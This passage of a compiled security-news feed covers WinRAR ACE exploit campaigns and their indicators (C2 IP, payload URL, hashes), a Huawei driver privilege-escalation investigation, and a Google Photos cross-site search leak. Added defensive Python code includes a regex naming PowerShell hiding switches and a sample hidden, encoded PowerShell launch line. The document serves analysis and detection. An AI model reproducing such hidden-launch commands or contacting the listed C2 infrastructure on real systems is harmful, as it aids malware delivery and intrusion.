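HIDING_RE = re.compile(
    r"(?i)-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|noni|noninteractive"
    r"|ep\s+bypass|executionpolicy\s+bypass)")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if the line has none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage_batch(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """(line number, decoded script, hiding switches) per encoded PowerShell launch."""
    findings = []
    for n, line in enumerate(lines, 1):
        script = decode_encoded_command(line)
        if script is not None:
            findings.append((n, script, [s.lower() for s in HIDING_RE.findall(line)]))
    return findings


def encode_for_powershell(script: str) -> str:
    """Used only to build the constructed sample below (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed batch file; the encoded command is a harmless Write-Output.
SAMPLE_BAT = [
    "@echo off",
    "powershell -NoP -W Hidden -NonI -Enc "
    + encode_for_powershell("Write-Output 'constructed sample'"),
    "exit",
]

if __name__ == "__main__":
    for lineno, script, switches in triage_batch(SAMPLE_BAT):
        print("line %d: %s  switches=%s" % (lineno, script, switches))
```

Real droppers often stack a second layer (a compressed or again base64-encoded stager inside the decoded script), so the decoded text is the starting point for the next decode rather than the end of the analysis.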


Figure 18: Empire backdoor

Indicators

| File Name/URL | Hash/URL |
| --- | --- |
| zakon.rar | 9b19753369b6ed1187159b95fc8a81cd |
| mssconf.bat | 79B53B4555C1FB39BA3C7B8CE9A4287E |
| C2 | 31.148.220[.]53 |
| URL | http://tiny-share[.]com/direct/7dae2d144dae4447a152bef586520ef8 |

Campaign 4: Credential and Credit Card Dumps as Decoys

Decoy Documents

This campaign uses credential dumps and likely stolen credit card dumps as decoy documents to distribute different types of RATs and password stealers.

One file, ‘leaks copy.rar’, used text files that contained stolen email IDs and passwords as decoys. These files are shown as they would be displayed in WinRAR in Figure 19.


Figure 19: Text files containing stolen email credentials as decoy

Another file, ‘cc.rar’, used a text file containing stolen credit card details as a decoy. The file as it would be displayed in WinRAR and sample contents of the decoy file are shown in Figure 20.


Figure 20: Text file containing stolen credit card details as decoy

Payloads

This campaign used payloads from different malware families. To keep the draft concise, we did not include the analysis of all of them. The decompilation of one of the payloads with hash 1BA398B0A14328B9604EEB5EBF139B40 shows keylogging capabilities (Figure 21). We later identified this sample as QuasarRAT.


Figure 21: Keylogging capabilities

The decompilation of all the .NET-based payloads shows that much of the code is written in Chinese. The decompilation of the malware with hash BCC49643833A4D8545ED4145FB6FDFD2, containing Chinese text, is shown in Figure 22. We later identified this sample as Buzy.


Figure 22: Code written in Chinese

The other payloads also have similar keylogging, password stealing and standard RAT capabilities. The VirusTotal submissions show the use of different malware families in this campaign and a wide range of targeting.

Hashes of ACE Files

| File Name | Hash |
| --- | --- |
| leaks copy.rar | e9815dfb90776ab449539a2be7c16de5 |
| cc.rar | 9b81b3174c9b699f594d725cf89ffaa4 |
| zabugor.rar | 914ac7ecf2557d5836f26a151c1b9b62 |
| zabugorV.rar | eca09fe8dcbc9d1c097277f2b3ef1081 |
| Combolist.rar | 1f5fa51ac9517d70f136e187d45f69de |
| Nulled2019.rar | f36404fb24a640b40e2d43c72c18e66b |
| IT.rar | 0f56b04a4e9a0df94c7f89c1bccf830c |

Hashes of Payloads

| File name | Hash | Malware Family |
| --- | --- | --- |
| explorer.exe | 1BA398B0A14328B9604EEB5EBF139B40 | QuasarRAT |
| explorer.exe | AAC00312A961E81C4AF4664C49B4A2B2 | Azorult |
| IntelAudio.exe | 2961C52F04B7FDF7CCF6C01AC259D767 | Netwire |
| Discord.exe | 97D74671D0489071BAA21F38F456EB74 | Razy |
| Discord.exe | BCC49643833A4D8545ED4145FB6FDFD2 | Buzy |
| old.exe | 119A0FD733BC1A013B0D4399112B8626 | Azorult |

FireEye Detection

FireEye detection names for the indicators in the attack:

FireEye Endpoint Security

IOC: WINRAR (EXPLOIT)

MG: Generic.mg

AV: 

  • Exploit.ACE-PathTraversal.Gen
  • Exploit.Agent.UZ
  • Exploit.Agent.VA
  • Gen:Heur.BZC.ONG.Boxter.91.1305E319
  • Gen:Variant.Buzy.2604
  • Gen:Variant.Razy.472302
  • Generic.MSIL.PasswordStealerA.5CBD94BB
  • Trojan.Agent.DPAS
  • Trojan.GenericKD.31783690
  • Trojan.GenericKD.31804183

FireEye Network Security

  • FE_Exploit_ACE_CVE201820250_2
  • FE_Exploit_ACE_CVE201820250_1
  • Backdoor.EMPIRE
  • Downloader.EMPIRE
  • Trojan.Win.Azorult
  • Trojan.Netwire

FireEye Email Security

  • FE_Exploit_ACE_CVE201820250_2
  • FE_Exploit_ACE_CVE201820250_1
  • FE_Backdoor_QUASARRAT_A
  • FE_Backdoor_EMPIRE

Conclusion

We have seen how various threat actors are abusing the recently disclosed WinRAR vulnerability using customized decoys and payloads, and different propagation techniques such as email and URL. Because of the huge WinRAR customer base, the lack of an auto-update feature and the ease of exploitation of this vulnerability, we believe it will be used by more threat actors in the coming days.

Traditional AV solutions will have a hard time providing proactive zero-day detection for unknown malware families. FireEye MalwareGuard, a component of FireEye Endpoint Security, detects and blocks all the PE executables mentioned in this blog post using machine learning. It is also worth noting that this vulnerability allows the malicious ACE file to write a payload to any path that WinRAR has permission to write to. Although the exploits we have seen so far chose to write the payload to the Startup folder, a more involved threat actor could choose a different file path to achieve code execution, bypassing any behavior-based rules that only look for WinRAR writing to the Startup folder. Enterprises should consider blocking vulnerable WinRAR versions and mandating an update to the latest version.

FireEye Endpoint Security, FireEye Network Security and FireEye Email Security detect and block these campaigns at several stages of the attack chain.

Acknowledgement

Special thanks to Jacob Thompson, Jonathan Leathery and John Miller for their valuable feedback on this blog post.

Apple fixed some interesting bugs in iOS and macOS

In addition to announcing a number of new products and subscription services, Apple has released security updates for iOS, macOS, Safari, tvOS, iTunes, iCloud, and Xcode. The security updates The update for Xcode – Apple’s integrated environment for developing software for macOS, iOS, watchOS, and tvOS – carries a fix for a single flaw: CVE-2018-4461, a kernel memory corruption issue that has been patched last December in iOS, tvOS, watchOS and macOS Mojave. This fix … More

The post Apple fixed some interesting bugs in iOS and macOS appeared first on Help Net Security.

Tesla Gives Away EV-Maker Model 3 Cars Along With a Hefty Cash Prize to Hackers



Amat Cama and Richard Zhu, a team of hackers who took part in the Pwn2Own 2019 hacking competition organized by Trend Micro's Zero Day Initiative (ZDI), exposed a vulnerability in the vehicle's system and won themselves a Tesla Model 3 from the electric vehicle (EV) maker along with a cash prize of $35,000.

The hackers focused on the infotainment system of the Tesla Model 3 and used a "JIT bug in the renderer" to take control of it.

In recent years, as part of Tesla's bug bounty program, the company has given away thousands of dollars in rewards to hackers who successfully uncovered vulnerabilities in its systems, and the EV maker has been "fairly quick" to fix the vulnerabilities uncovered by white hat hackers.

David Lau, Vice President of Vehicle Software at Tesla, says, "Since launching our bug bounty programme in 2014, we have continuously increased our investments into partnerships with security researchers to ensure that all Tesla owners constantly benefit from the brightest minds in the community."

He further adds, “We develop our cars with the highest standards of safety in every respect, and our work with the security research community is invaluable to us. Since launching our bug bounty program in 2014 – the first to include a connected consumer vehicle – we have continuously increased our investments into partnerships with security researchers to ensure that all Tesla owners constantly benefit from the brightest minds in the community. We look forward to learning about, and rewarding, great work in Pwn2Own so that we can continue to improve our products and our approach to designing inherently secure systems.”



From alert to driver vulnerability: Microsoft Defender ATP investigation unearths privilege escalation flaw

With Microsoft continuously improving kernel mitigations and raising the bar for exploiting native kernel components, third-party kernel drivers are becoming a more appealing target for attackers and an important area of research for security analysts. A vulnerability in a signed third-party driver could have a serious impact: it can be abused by attackers to escalate privileges or, more commonly, bypass driver signature enforcement—without the complexity of using a more expensive zero-day kernel exploit in the OS itself.

Computer manufacturers usually ship devices with software and tools that facilitate device management. These software and tools, including drivers, often contain components that run with ring-0 privileges in the kernel. With these components installed by default, each must be as secure as the kernel; even one flawed component could become the Achilles’ heel of the whole kernel security design.

We discovered such a driver while investigating an alert raised by Microsoft Defender Advanced Threat Protection’s kernel sensors. We traced the anomalous behavior to a device management driver developed by Huawei. Digging deeper, we found a lapse in the design that led to a vulnerability that could allow local privilege escalation.

We reported the vulnerability (assigned CVE-2019-5241) to Huawei, who responded and cooperated quickly and professionally. On January 9, 2019, Huawei released a fix: https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190109-01-pcmanager-en.

In this blog post, we’d like to share our journey from investigating one Microsoft Defender ATP alert to discovering a vulnerability, cooperating with the vendor, and protecting customers.

Detecting kernel-initiated code injections with Microsoft Defender ATP

Starting in Windows 10, version 1809, the kernel has been instrumented with new sensors designed to trace User APC code injection initiated by a kernel code, providing better visibility into kernel threats like DOUBLEPULSAR. As described in our in-depth analysis, DOUBLEPULSAR is a kernel backdoor used by the WannaCry ransomware to inject the main payload into user-space. DOUBLEPULSAR copied the user payload from the kernel into an executable memory region in lsass.exe and inserted a User APC to a victim thread with NormalRoutine targeting this region.

Figure 1. WannaCry User APC injection technique schematic diagram

While the User APC code injection technique isn’t novel (see Conficker or Valerino’s earliest proof-of-concept), detecting threats running in the kernel is not trivial. Since PatchGuard was introduced, hooking NTOSKRNL is no longer allowed; there’s no documented way drivers could get notification for any of the above operations. Hence, without proper optics, the only sustainable strategy would be applying memory forensics, which can be complicated.

The new set of kernel sensors aims to address this kind of kernel threat. Microsoft Defender ATP leverages these sensors to detect suspicious operations invoked by kernel code that might lead to code injection into user mode. One such suspicious operation, though not related to WannaCry, DOUBLEPULSAR, or other known kernel threats, triggered the investigation that led to our discovery of a vulnerability.

Investigating an anomalous code injection from the kernel

While monitoring alerts related to kernel-mode attacks, one alert drew our attention:

Figure 2. Microsoft Defender ATP kernel-initiating code injection alert

The alert process tree showed an abnormal memory allocation and execution in the context of services.exe by kernel code. Investigating further, we found that an identical alert was fired on another machine around the same time.

To get a better understanding of the observed anomaly, we looked at the raw signals we got from the kernel sensors. This analysis yielded the following findings:

  • A system thread called nt!NtAllocateVirtualMemory and allocated a single page (size = 0x1000) with the PAGE_EXECUTE_READWRITE protection mask in the services.exe address space
  • The system thread then called nt!KeInsertQueueApc to queue a User APC to an arbitrary services.exe thread, with NormalRoutine pointing to the beginning of the executable page and NormalContext pointing to offset 0x800

The payload copied from kernel mode is divided into two portions: a shellcode (NormalRoutine) and a parameter block (NormalContext). At this point, the overall behavior looked suspicious enough for us to proceed with the hunting. Our goal was to incriminate the kernel code that triggered the alert.
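The two raw signals above form a simple correlation rule: a kernel-initiated RWX allocation in a user-mode process, followed by a kernel-initiated User APC whose NormalRoutine lands inside that allocation. The following is an added example of that correlation over constructed sensor events; it is not Microsoft Defender ATP's detection logic, and the event format, field names and PIDs are assumptions made for the example.

```python
# Added example, not Microsoft's code: correlate constructed kernel-sensor events to flag
# kernel-initiated User APC injection. Event schema and sample values are assumptions.
from dataclasses import dataclass

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory protection constant


@dataclass
class SensorEvent:
    seq: int                 # ordering key from the sensor stream
    op: str                  # "NtAllocateVirtualMemory" or "KeInsertQueueApc"
    kernel_initiated: bool   # sensor attributed the call to kernel code, not a user-mode caller
    target_pid: int          # process whose address space / thread is affected
    address: int = 0         # allocation base, or the APC NormalRoutine address
    size: int = 0            # allocation size in bytes
    protect: int = 0         # allocation protection mask
    normal_context: int = 0  # APC NormalContext argument


def find_kernel_apc_injections(events):
    """Return one finding per kernel-initiated User APC whose NormalRoutine points into
    a page that kernel code earlier allocated as RWX in the same target process."""
    rwx_allocs = []   # kernel-initiated RWX allocations seen so far, in stream order
    findings = []
    for ev in sorted(events, key=lambda e: e.seq):
        if not ev.kernel_initiated:
            continue  # user-mode allocations/APCs are out of scope for this rule
        if ev.op == "NtAllocateVirtualMemory" and ev.protect & PAGE_EXECUTE_READWRITE:
            rwx_allocs.append(ev)
        elif ev.op == "KeInsertQueueApc":
            for alloc in rwx_allocs:
                if (alloc.target_pid == ev.target_pid
                        and alloc.address <= ev.address < alloc.address + alloc.size):
                    findings.append({
                        "pid": ev.target_pid,
                        "page": alloc.address,
                        # where the shellcode and its parameter block sit in the page
                        "routine_offset": ev.address - alloc.address,
                        "context_offset": ev.normal_context - alloc.address,
                    })
    return findings


# Constructed sample stream: a benign user-mode RWX allocation, then the pattern from
# the investigation (RWX page in services.exe, APC at page start, context at +0x800),
# then a kernel-queued APC whose routine is not in any kernel-allocated RWX page.
SAMPLE_EVENTS = [
    SensorEvent(1, "NtAllocateVirtualMemory", False, 1234, 0x20000, 0x1000, PAGE_EXECUTE_READWRITE),
    SensorEvent(2, "NtAllocateVirtualMemory", True, 700, 0x1A0000, 0x1000, PAGE_EXECUTE_READWRITE),
    SensorEvent(3, "KeInsertQueueApc", True, 700, 0x1A0000, normal_context=0x1A0800),
    SensorEvent(4, "KeInsertQueueApc", True, 700, 0x7FF800001000),
]

if __name__ == "__main__":
    for f in find_kernel_apc_injections(SAMPLE_EVENTS):
        print(f"kernel APC injection into pid {f['pid']}: page {f['page']:#x}, "
              f"routine +{f['routine_offset']:#x}, context +{f['context_offset']:#x}")
```

The rule deliberately ignores user-mode allocations and APCs queued from user mode; it only fires when both halves of the pattern are attributed to kernel code, which is exactly the visibility the new sensors add.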

Incriminating the source

In user-mode threats, the caller process context could shed light on the actor and link to other phases in the attack chain. In contrast, with kernel-mode threats, the story is more complicated. The kernel by nature is asynchronous; callbacks might be called in an arbitrary context, making process context meaningless for forensics purposes.

Therefore, we tried to find indirect evidence of third-party code loaded into the kernel. By inspecting the machine timeline, we found that several third-party drivers had been loaded earlier that day.

We concluded, based on their file paths, that they were all related to an app from Huawei called PC Manager, device management software for Huawei MateBook laptops. The installer is available on Huawei's website, so we downloaded it for inspection. For each Huawei driver we used dumpbin.exe to examine imported functions.

And then we had a hit:

Figure 3. dumpbin utility used to detect user APC injection primitives

HwOs2Ec10x64.sys: Unexpected behavior from a driver

Hunting led us to the kernel code that triggered the alert. One would expect device management software to perform mostly hardware-related tasks, with the supplied device drivers being the communication layer with the OEM-specific hardware. So why was this driver exhibiting unusual behavior? To answer this question, we reverse-engineered HwOs2Ec10x64.sys.

Our entry point was the function implementing the user APC injection. We found a code path that:

  1. allocates an RWX page in some target process;
  2. resolves CreateProcessW and CloseHandle function pointers in the address space of the target process;
  3. copies a code area from the driver as well as what seemed to be a parameter block to the allocated page; and
  4. performs User APC injection targeting that page

The parameter block contains both the resolved function pointers as well as a string, which was found to be a command line.

Figure 4. User APC injection code

The APC normal routine is a shellcode which calls CreateProcessW with the given process command line string. This implied that the purpose of the code injection to services.exe is to spawn a child process.

Figure 5. User shellcode performing process creation

Inspecting the xrefs, we noticed that the injection code originated from a create-process notify routine when Create = FALSE. Hence, the trigger was some process termination.

But what command does the shellcode execute? Attaching a kernel debugger and setting a breakpoint on the memcpy_s in charge of copying the parameters from kernel to user-mode revealed the created process: one of Huawei’s installed services, MateBookService.exe, invoked with “/startup” in its command line.

Figure 6. Breakpoint hit on the call to memcpy_s copying shellcode parameters

Why would a valid service be started that way? Inspecting MateBookService.exe!main revealed a “startup mode” that revived the service if it’s stopped – some sort of watchdog mechanism meant to keep the Huawei PC Manager main service running.

Figure 7. MateBookService.exe /startup code path

At this point of the investigation, the only missing piece in the puzzle was making sure the terminated process triggering the injection is indeed MateBookService.exe.

Figure 8. Validating terminated process identity

The code path that decides whether to inject to services.exe uses a global list of watched process names. Hitting a breakpoint in the iteration loop revealed which process was registered: it was MateBookService.exe, as expected, and it was the only process on that list.

Figure 9. Breakpoint hit during process name comparison against global list

HwOs2Ec10x64.sys also provided process protection against external tampering. Any attempt to force MateBookService.exe termination would fail with Access Denied.

Abusing HwOs2Ec10x64.sys process watch mechanism

The next step in our investigation was to determine whether an attacker can tamper with the global watched process list. We came across an IOCTL handler that adds an entry to that list. The MateBookService.exe process likely uses this IOCTL to register itself when the service starts. This IOCTL is sent to the driver's control device, created from its DriverEntry.

Figure 10. HwOs2Ec10x64.sys control device creation with IoCreateDevice

Since the device object is created with IoCreateDevice, Everyone has RW access to it. Another important observation was that this device isn’t exclusive, hence multiple handles could be opened to it.

Nevertheless, when we tried to open a handle to the device \\.\HwOs2EcX64, it failed with Last Error = 537, “Application verifier has found an error in the current process”. The driver was rejecting our request to open the device. How is access enforced? It must be on the CreateFile path; in other words, in HwOs2Ec10x64.sys IRP_MJ_CREATE dispatch routine.

Figure 11. IRP_MJ_CREATE dispatch routine

This function validates the calling process by making sure that the main executable path belongs to a whitelist (e.g., C:\Program Files\Huawei\PCManager\MateBookService.exe). This simple check on the initiating process name, however, doesn’t guarantee the integrity of the calling process. An attacker-controlled instance of MateBookService.exe will still be granted access to the device \\.\HwOs2EcX64 and be able to call some of its IRP functions. The attacker-controlled process could then abuse this capability to talk to the device and register a watched executable of its own choice. Given that a parent process has full permissions over its children, even code with low privileges could spawn an infected MateBookService.exe and inject code into it. In our proof-of-concept, we used process hollowing.

Figure 12. Procmon utility results showing POC process start/exit & IL

Because watched processes are blindly launched by the watchdog when they’re terminated, the attacker-controlled executable would be invoked as a child of services.exe, running as LocalSystem, hence with elevated privileges.

Figure 13. Procexp utility process-tree view showing LPE_POC running as LocalSystem

Responsible disclosure and protecting customers

Once we had a working POC demonstrating the elevation of privilege from a low-integrity attacker-controlled process, we responsibly reported the bug to Huawei through the Microsoft Security Vulnerability Research (MSVR) program. The vulnerability was assigned CVE-2019-5241. Meanwhile, we kept our customers safe by building a detection mechanism that would raise an alert for any successful privilege escalation exploiting the HwOs2Ec10x64.sys watchdog vulnerability as we described.

Figure 14. Microsoft Defender ATP alerting on the privilege escalation POC code

Abusing a second IOCTL handler

Having been able to freely invoke IOCTL handlers of the driver from user mode, we looked for other capabilities that could be abused. We found one: the driver provided a capability to map any physical page into user mode with RW permissions. Invoking this handler allowed code running with low privileges to read and write beyond the process boundaries—to other processes or even to kernel space. This, of course, means a full machine compromise.

We also worked with Huawei to fix this second vulnerability, which was assigned CVE-2019-5242. Huawei addressed the flaw in the same security advisory: https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190109-01-pcmanager-en.

We presented our research at the Blue Hat IL Conference in February. Watch the video recording here, and get the slide deck here.

Summary

While the original alert turned out to be benign, in the sense that it didn’t detect an actual kernel threat like DOUBLEPULSAR, it did trigger an investigation that eventually led us to finding vulnerabilities. The two vulnerabilities we discovered in the driver prove the importance of designing software and products with security in mind. Security boundaries must be honored. Attack surface should be minimized as much as possible. In this case, the flaws could have been prevented if certain precautions were taken:

  • The device object created by the driver should be created with a DACL granting SYSTEM RW access (since only the vendor’s services were communicating directly with the driver)
  • If a service must be kept running, developers should check whether the OS already provides a way to do so before implementing a complex mechanism of their own
  • User-mode shouldn’t be allowed to perform privileged operations like writing to any physical page; if needed, the driver should do the actual writing for well-defined, hardware-related scenarios
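The first precaution is a configuration question: which principals the device object's DACL grants access to. In the WDK that DACL is expressed as an SDDL string passed to IoCreateDeviceSecure, and wdmsec.h defines SDDL_DEVOBJ_SYS_ALL ("D:P(A;;GA;;;SY)") for the "SYSTEM only" case the summary recommends. As an added example (not Microsoft's or Huawei's code), the following parses a device DACL in SDDL form and flags allow ACEs that grant broad principals such as Everyone; the weak string is constructed to stand in for the Everyone-RW situation the post describes and is not the driver's actual descriptor.

```python
# Added example, not Microsoft's or Huawei's code: audit a device object DACL given as an
# SDDL string. WEAK_DEVOBJ_DACL is a constructed stand-in for "Everyone has RW access".
import re

ACE_RE = re.compile(r"\(([^)]*)\)")

# Well-known SDDL account aliases that should not appear in an allow ACE on a control
# device that only the vendor's own SYSTEM service is meant to talk to.
BROAD_PRINCIPALS = {
    "WD": "Everyone", "AU": "Authenticated Users", "BU": "Users",
    "IU": "Interactive", "BG": "Guests", "AN": "Anonymous",
}

SDDL_DEVOBJ_SYS_ALL = "D:P(A;;GA;;;SY)"                      # wdmsec.h constant
SDDL_DEVOBJ_SYS_ALL_ADM_ALL = "D:P(A;;GA;;;SY)(A;;GA;;;BA)"  # wdmsec.h constant
WEAK_DEVOBJ_DACL = "D:P(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW;;;WD)"  # constructed


def parse_sddl_dacl(sddl):
    """Parse the DACL part of an SDDL string ("D:" + flags + ACEs) into a dict.
    Each ACE has the form (type;flags;rights;object_guid;inherit_guid;account)."""
    if not sddl.startswith("D:"):
        raise ValueError("expected a DACL string starting with 'D:'")
    body = sddl[2:]
    control_flags = body.split("(", 1)[0]   # e.g. "P" = protected from inheritance
    aces = []
    for m in ACE_RE.finditer(body):
        parts = m.group(1).split(";")
        if len(parts) != 6:
            raise ValueError(f"malformed ACE: ({m.group(1)})")
        ace_type, ace_flags, rights, _obj_guid, _inherit_guid, account = parts
        if rights.startswith("0x"):
            right_tokens = [rights]                      # numeric access mask
        else:
            right_tokens = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "flags": ace_flags,
                     "rights": right_tokens, "account": account})
    return {"protected": "P" in control_flags, "aces": aces}


def audit_device_dacl(sddl):
    """Return human-readable findings; an empty list means the DACL is restricted
    to SYSTEM/Administrators-style principals and protected from inheritance."""
    parsed = parse_sddl_dacl(sddl)
    findings = []
    for ace in parsed["aces"]:
        if ace["type"] != "A":          # only access-allowed ACEs widen access
            continue
        if ace["account"] in BROAD_PRINCIPALS:
            findings.append(f"{BROAD_PRINCIPALS[ace['account']]} ({ace['account']}) "
                            f"granted {','.join(ace['rights'])}")
    if not parsed["protected"]:
        findings.append("DACL not protected (no P flag): inherited ACEs could widen access")
    return findings


if __name__ == "__main__":
    for label, sddl in [("weak", WEAK_DEVOBJ_DACL), ("hardened", SDDL_DEVOBJ_SYS_ALL)]:
        print(label, sddl, audit_device_dacl(sddl) or "OK")
```

The same audit applies to any driver's control device: if the only legitimate client is a SYSTEM service, nothing in the DACL should name WD, AU, BU or IU, and the image-path check in IRP_MJ_CREATE described above is no substitute, since the caller's identity is decided by the DACL before the dispatch routine ever runs.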

Microsoft’s driver security checklist provides some guidelines for driver developers to help reduce the risk of drivers being compromised.

Our discovery of the driver vulnerabilities also highlights the strength of Microsoft Defender ATP’s sensors. These sensors expose anomalous behavior and give SecOps personnel the intelligence and tools to investigate threats, as we did.

Anomalous behaviors typically point to attack techniques perpetrated by adversaries with malicious intent. In this case, they pointed to a flawed design that could be abused. Nevertheless, Microsoft Defender ATP exposed a security flaw and protected customers before it could even be used in actual attacks.

Not yet reaping the benefits of Microsoft Defender ATP’s industry-leading optics and detection capabilities? Sign up for a free trial today.
Amit Rapaport (@realAmitRap)
Microsoft Defender Research team

The post From alert to driver vulnerability: Microsoft Defender ATP investigation unearths privilege escalation flaw appeared first on Microsoft Security.

Elsevier Exposed User Credentials Publicly Through Misconfigured Server

A popular publisher of scientific journals Elsevier has now joined the trail of firms that inadvertently breach users’ privacy. According

Elsevier Exposed User Credentials Publicly Through Misconfigured Server on Latest Hacking News.

2017 Cisco WebEx flaw increasingly leveraged by attackers, phishing campaigns rise

Network attacks targeting a vulnerability in the Cisco Webex Chrome extension have increased dramatically. In fact, they were the second-most common network attack, according to WatchGuard Technologies latest Internet Security Report for the last quarter of 2018. The vulnerability was first disclosed and patched in 2017 and attacks were almost non-existent in early 2018, but WatchGuard detections grew by over 7,000 percent from Q3 to Q4. Phishing campaigns The report also shows that phishing campaigns … More

The post 2017 Cisco WebEx flaw increasingly leveraged by attackers, phishing campaigns rise appeared first on Help Net Security.

Critical Vulnerabilities Found in Recently Released NSA Reverse Engineering Tool “Ghidra”

Earlier this month, NSA open-sourced Ghidra – its reverse engineering tool. Right after its release, researchers began discovering bugs in

Critical Vulnerabilities Found in Recently Released NSA Reverse Engineering Tool “Ghidra” on Latest Hacking News.

Medtronic defibrillators vulnerable to life threatening cyber attacks

By Waqas

Defibrillators are electronic devices manufactured to save the lives of people with life-threatening heart conditions such as Hypertrophic Cardiomyopathy (HCM). But now, according to the Department of Homeland Security (DHS), Medtronic defibrillators are vulnerable to cyber attacks allowing hackers to remotely control the device within “short-range access.” In total, 20 Medtronic products are vulnerable affecting over […]

This is a post from HackRead.com Read the original post: Medtronic defibrillators vulnerable to life threatening cyber attacks

Medtronic’s Implantable Defibrillators Vulnerable to Life-Threatening Hacks

The U.S. Department of Homeland Security Thursday issued an advisory warning people of severe vulnerabilities in over a dozen heart defibrillators that could allow attackers to fully hijack them remotely, potentially putting lives of millions of patients at risk. Cardioverter Defibrillator is a small surgically implanted device (in patients' chests) that gives a patient's heart an electric

E Hacking News – Latest Hacker News and IT Security News: Facebook Exposes Passwords of Hundreds of Millions of Its Users



A rather shocking vulnerability was uncovered by security researcher Brian Krebs, who reports that Facebook left the passwords of approximately 200 to 600 million users simply ‘stored’ in plain text.

A huge number of Facebook, Facebook Lite, and Instagram users may have had their passwords exposed as the result of a disturbing oversight by the social networking company.

Facebook learned of the issue this past January and has since confirmed the security failure, but maintains that it has fixed the issue and has not discovered any proof that the data was 'abused.'

Although all users whose passwords were exposed will be informed, the 'shocking flaw' comes as yet another blow to the already eroding trust of many Facebook users, in the midst of two years of consecutive privacy scandals.

The firm is still attempting to determine exactly how many passwords were exposed and for how long, according to a source at Facebook who alerted Krebs to the issue in the first place.

‘It’s so far unclear what caused some users’ passwords to be left exposed. To be clear, these passwords were never visible to anyone outside of Facebook and we have found no evidence to date that anyone internally abused or improperly accessed them, we estimate that we will notify hundreds of millions of Facebook Lite users, tens of millions of other Facebook users, and tens of thousands of Instagram users.'
- Facebook's public statement, released alongside Krebs' report, which confirms that the company found the plain-text passwords during a routine security review in January.

In any case, while Facebook says no password reset is required as such, and that it will warn users if their information has been or will be abused in any way, security experts still recommend that users change their current passwords.


Panic after hackers take control of emergency tornado alarms in Texas

By Waqas

On March 12th, at around 2:30 a.m., residents of two Texas towns panicked after hearing tornado alarms that went off until 4:00 a.m. They were disturbed because the alarms repeatedly went on and off for about one and a half hours, thanks to hackers – Finally, the relevant authorities were able to turn them off. See: […]

This is a post from HackRead.com Read the original post: Panic after hackers take control of emergency tornado alarms in Texas

Flaw in NSA’s GHIDRA leads to remote code execution attacks

By Waqas

GHIDRA is NSA’s reverse engineering tool released earlier this month. Earlier this month, Hackread.com posted about the National Security Agency (NSA) publicly releasing its decompiler and disassembler tool GHIDRA and making it open-source software. Now, it has been revealed that the generic reverse engineering tool has a flaw that can be exploited by cybercriminals for carrying […]

This is a post from HackRead.com Read the original post: Flaw in NSA’s GHIDRA leads to remote code execution attacks

Report: with most exploited vuln of 2018, it’s really Really REALLY time to ditch IE!

Microsoft's products are still a leading source of exploitable security vulnerabilities used by hackers, according to a report by the firm Recorded Future.

The post Report: with most exploited vuln of 2018, it’s really Really REALLY time to ditch IE! appeared first on The Security Ledger.

When Is a Data Breach a Data Breach?

A data breach remains a common headline in the news cycle. A different company, website or social network reports a security issue almost daily. If it feels like using the internet has become a risky endeavor, the feeling is accurate. But what exactly classifies an event as a data breach? The world wide web is […]

The post When Is a Data Breach a Data Breach? appeared first on The State of Security.

Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History

A now-patched vulnerability in the web version of Google Photos allowed malicious websites to expose where, when, and with whom your photos were taken.

Background

One trillion photos were taken in 2018. With image quality and file size increasing, it’s obvious why more and more people choose to host their photos on services like iCloud, Dropbox and Google Photos.

One of the best features of Google Photos is its search engine. Google Photos automatically tags all your photos using each picture’s metadata (geographic coordinates, date, etc.) and a state-of-the-art AI engine, capable of describing photos with text, and detecting objects and events such as weddings, waterfalls, sunsets and many others. If that’s not enough, facial recognition is also used to automatically tag people in photos. You could then use all this information in your search query just by writing “Photos of me and Tanya from Paris 2018”.

The Threat

I’ve used Google Photos for a few years now, but only recently learned about its search capabilities, which prompted me to check for side-channel attacks. After some trial and error, I found that the Google Photos search endpoint is vulnerable to a browser-based timing attack called Cross-Site Search (XS-Search).

In my proof of concept, I used the HTML link tag to create multiple cross-origin requests to the Google Photos search endpoint. Using JavaScript, I then measured the amount of time it took for the onload event to trigger. I used this information to calculate the baseline time — in this case, timing a search query that I know will return zero results.

Next, I timed the following query: “photos of me from Iceland”, and compared the result to the baseline. If the search took longer than the baseline, I could assume the query returned results and thus infer that the current user had visited Iceland.

As I mentioned above, the Google Photos search engine takes into account the photo metadata. So by adding a date to the search query, I could check if the photo was taken in a specific time range. By repeating this process with different time ranges, I could quickly approximate the time of the visit to a specific place or country.

Attack Flow

The video below demonstrates how a 3rd-party site can use time measurements to extract the names of the countries you took photos in. The first bar in the video, named “controlled”, represents the baseline of an empty results page timing. Any time measurement above the baseline indicates a non-empty result timing, i.e., the current user has visited the queried country.

For this attack to work, we need to trick a user into opening a malicious website while logged into Google Photos. This can be done by sending a victim a direct message on a popular messaging service or email, or by embedding malicious JavaScript inside a web ad. The JavaScript code will silently generate requests to the Google Photos search endpoint, extracting Boolean answers to any query the attacker wants.

This process can be incremental, as the attacker can keep track of what has already been asked and continue from there the next time you visit one of his malicious websites.
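What makes this attack work is that an attacker's page can make the victim's browser issue credentialed cross-site requests to the search endpoint and time them. On the defender's side, the usual fix is a resource isolation policy: the server inspects the Fetch Metadata request headers (Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-Dest) and refuses cross-site subresource loads before doing any search work, so the timing no longer depends on the query. The block below is an added example of that check, written by the editor and not taken from Imperva's proof of concept or from Google; the endpoint path, the request shape and the photo index are assumptions.

```python
# Added example, not from the original post: a Fetch Metadata based resource isolation
# check for a search endpoint. Header values follow the Fetch Metadata request headers
# spec; the request dict shape, SEARCH_PATH and PHOTO_INDEX are assumptions.

SEARCH_PATH = "/search"                                      # hypothetical endpoint
PHOTO_INDEX = {"photos of me from Iceland": ["IMG_0042.jpg"]}  # constructed sample data


def is_allowed_request(method, headers):
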